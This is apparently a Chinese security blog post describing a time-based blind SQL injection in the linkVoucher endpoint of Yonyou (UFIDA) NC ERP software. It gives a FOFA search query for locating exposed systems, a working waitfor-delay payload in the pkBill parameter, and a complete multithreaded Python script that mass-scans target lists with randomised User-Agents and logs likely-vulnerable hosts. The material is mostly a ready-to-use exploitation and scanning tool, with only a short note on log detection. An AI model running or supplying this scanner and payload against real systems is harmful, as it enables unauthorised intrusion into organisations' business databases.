用友 NC linkVoucher SQL注入 用友漏洞利用

前言
用友 NC linkVoucher SQL注入  用友漏洞利用
声明:本文仅供学习参考使用,如若造成其他不良影响,均与本公众号无关!

漏洞复现

fofa查询语句:

app="用友-UFIDA-NC"

利用脚本进行检测:

用友 NC linkVoucher SQL注入  用友漏洞利用

手工复现:

用友 NC linkVoucher SQL注入  用友漏洞利用

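POC(基于时间的盲注:在 pkBill 参数中拼接 SQL Server 的 waitfor delay 语句,响应延迟约 5 秒即判定为疑似存在注入;单次延迟也可能由网络或服务器负载引起,需人工复核。防守方可在 Web 访问日志或 WAF 中检索该路径下 pkBill 参数含 waitfor 的请求。)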

/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'--

批量检测脚本

import requests
import re
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
import os
 
# Silence urllib3's InsecureRequestWarning. The request in check_vuln() is sent
# with verify=False, so without this call each request would emit that warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Targets read from the -f file; filled in the __main__ block.
url_list = []
# Title reused for the banner, the argparse description and the results-file
# name prefix ("<file_name>_vuln.txt").
file_name = '用友NC系统 linkVoucher sql注入'
# FOFA search expression quoted by the article: app="用友-UFIDA-NC"
def get_ua():
    """Return a Chrome-style User-Agent string with randomised fields.

    The Chrome major version is drawn from 55-62, the build number from
    0-3200 and the patch number from 0-140; the platform token is picked
    from three fixed values.

    NOTE: the value differs on every call, so the User-Agent header is not a
    stable field for matching this script's traffic in access logs; the
    request path and query string built in check_vuln() stay constant.
    """
    major = random.randint(55, 62)
    build = random.randint(0, 3200)
    patch = random.randint(0, 140)
    platforms = [
        '(Windows NT 6.1; WOW64)',
        '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)',
    ]
    chrome = f'Chrome/{major}.0.{build}.{patch}'
    # The platform is drawn last, after the three version numbers.
    platform = random.choice(platforms)
    return f'Mozilla/5.0 {platform} AppleWebKit/537.36 (KHTML, like Gecko) {chrome} Safari/537.36'
 
 
# Proxy mapping in the format `requests` accepts, with both schemes pointing
# at a proxy on localhost port 8080. It is not passed to the requests.get()
# call in check_vuln(), so it has no effect unless that call is changed.
proxies = dict.fromkeys(('http', 'https'), 'http://127.0.0.1:8080')
 
 
def wirte_targets(vurl, file_name):
    """Append *vurl* followed by a newline to the file at *file_name*.

    The file is opened in append mode, so it is created when missing and
    entries from earlier runs are kept. The *file_name* parameter shadows the
    module-level ``file_name`` title inside this function.
    """
    with open(file_name, mode="a+") as sink:
        sink.writelines((vurl + "\n",))
 
 
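def check_file(filename):
    """Print the findings recorded in *filename* and how many there are.

    Args:
        filename: Path of the results file written by wirte_targets().

    The original body ignored *filename* and rebuilt the path from the
    module-level ``file_name``; the argument is now the path that is read.
    Both callers in this file pass ``f'{file_name}_vuln.txt'``, so their
    behaviour is unchanged.

    NOTE: the results file is opened in append mode by wirte_targets(), so the
    listing and the count include entries left over from earlier runs.
    """
    print('-------------------------------------------')
    if os.path.isfile(filename):
        print('存在漏洞的url如下~~~')
        with open(filename, 'r') as file:
            lines = file.readlines()
        # One recorded finding per line, printed in green.
        for line in lines:
            print(f'\033[32m{line.strip()}\033[0m')
        print('存在漏洞url:{}个'.format(len(lines)))
    else:
        print('未发现漏洞!!!!')
    print('-------------------------------------------')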
 
 
def check_vuln(url):
    """Send one time-delay probe to *url* and record it if the reply is slow.

    Only the scheme and host[:port] of *url* are kept; the linkVoucher path
    and a ``pkBill`` value carrying a 5-second ``waitfor delay`` are appended
    to form the request. An elapsed time of 5 seconds or more is treated as a
    hit: the URL is printed in green and appended to ``{file_name}_vuln.txt``
    through wirte_targets(). Returns None.

    NOTE(review): the verdict rests on a single timing sample with no baseline
    request for comparison, so a slow or overloaded server is reported the
    same way as an injectable one. Entries in the results file need manual
    confirmation before they are treated as findings.
    """
    url = parse.urlparse(url)
    # "scheme://host[:port]", used only in the console messages below.
    url1 = url.scheme + '://' + url.netloc
    # url[0] and url[1] are the parsed scheme and netloc; any path or query
    # present in the input URL is discarded.
    vuln_url = f'{url[0]}://{url[1]}/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1\'waitfor+delay+\'0:0:5\'--'
    # Browser-like request headers; the User-Agent is regenerated per call.
    # NOTE(review): commented-out headers and request bodies left over from
    # unrelated script templates were dropped here; this check never used them.
    headers = {
        'User-Agent': get_ua(),
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'keep-alive',
        'Cache-Control': 'max-age=0',
    }

    try:
        # TLS certificate verification is off (verify=False), redirects are
        # not followed and the timeout is 15 seconds.
        res = requests.get(url=vuln_url, headers=headers, allow_redirects=False, timeout=15, verify=False)
        res_time = res.elapsed.total_seconds()
        # The threshold matches the 5-second delay requested in the query.
        if res_time >= 5:
            # Console line: probed URL plus the measured delay in seconds.
            print('\033[32m[+]{}   延迟:{}秒\033[0m'.format(vuln_url,res_time))
            # The same text is appended to the shared results file.
            wirte_targets(vuln_url+f'   延迟:{res_time}秒', f"{file_name}_vuln.txt")

        else:
            print("\033[34m[-]{} not vulnerable. {}\033[0m".format(url1, res.status_code))
    except Exception as e:
        # NOTE(review): every exception, not only a timeout, is reported as
        # "is timeout", and `e` is never shown, so the real cause is lost.
        print("\033[31m[!]{} is timeout\033[0m".format(url1))
 
 
 
 
def multithreading(url_list, pools=5):
    """Run check_vuln() on every entry of *url_list* using a thread pool.

    Args:
        url_list: Iterable of target URLs; it is copied before use.
        pools: Number of worker threads handed to threadpool.ThreadPool.

    Blocks until every queued request has finished. Returns None.
    """
    targets = list(url_list)
    workers = threadpool.ThreadPool(pools)
    # One work request per target, queued in input order.
    for job in threadpool.makeRequests(check_vuln, targets):
        workers.putRequest(job)
    workers.wait()
 
 
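if __name__ == '__main__':
    # Banner: the tool title followed by the author's credit lines.
    print(f"\n{file_name}\n                         ——————by hyuya~\n"
          f"                            ——————知识星球:大自然的nday搬运库(石占)")

    arg = ArgumentParser(description=f'{file_name}')
    arg.add_argument("-u",
                     "--url",
                     help="Target URL; Example:http://ip:port")
    arg.add_argument("-f",
                     "--file",
                     help="Target URL; Example:url.txt")
    args = arg.parse_args()
    url = args.url
    filename = args.file
    start = time()
    print('[*]任务开始...')
    if url is not None and filename is None:
        # Single target. The original also ran the thread pool on an empty
        # list here and printed the results file twice; the summary is now
        # printed once, at the end.
        check_vuln(url)
    elif url is None and filename is not None:
        # One target per line; the file is closed once it has been read and
        # blank lines are skipped instead of being queued as empty targets.
        with open(filename) as targets:
            for raw in targets:
                entry = raw.replace('\n', '')
                if entry:
                    url_list.append(entry)
        multithreading(url_list, 10)
    # With both -u and -f, or with neither, nothing is checked and only the
    # existing results file is printed below.
    end = time()
    print('任务完成,用时%d' % (end - start))
    check_file(f'{file_name}_vuln.txt')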

 

 

原文始发于微信公众号(Undoubted Security):【漏洞分享】用友 NC linkVoucher SQL注入 用友漏洞利用
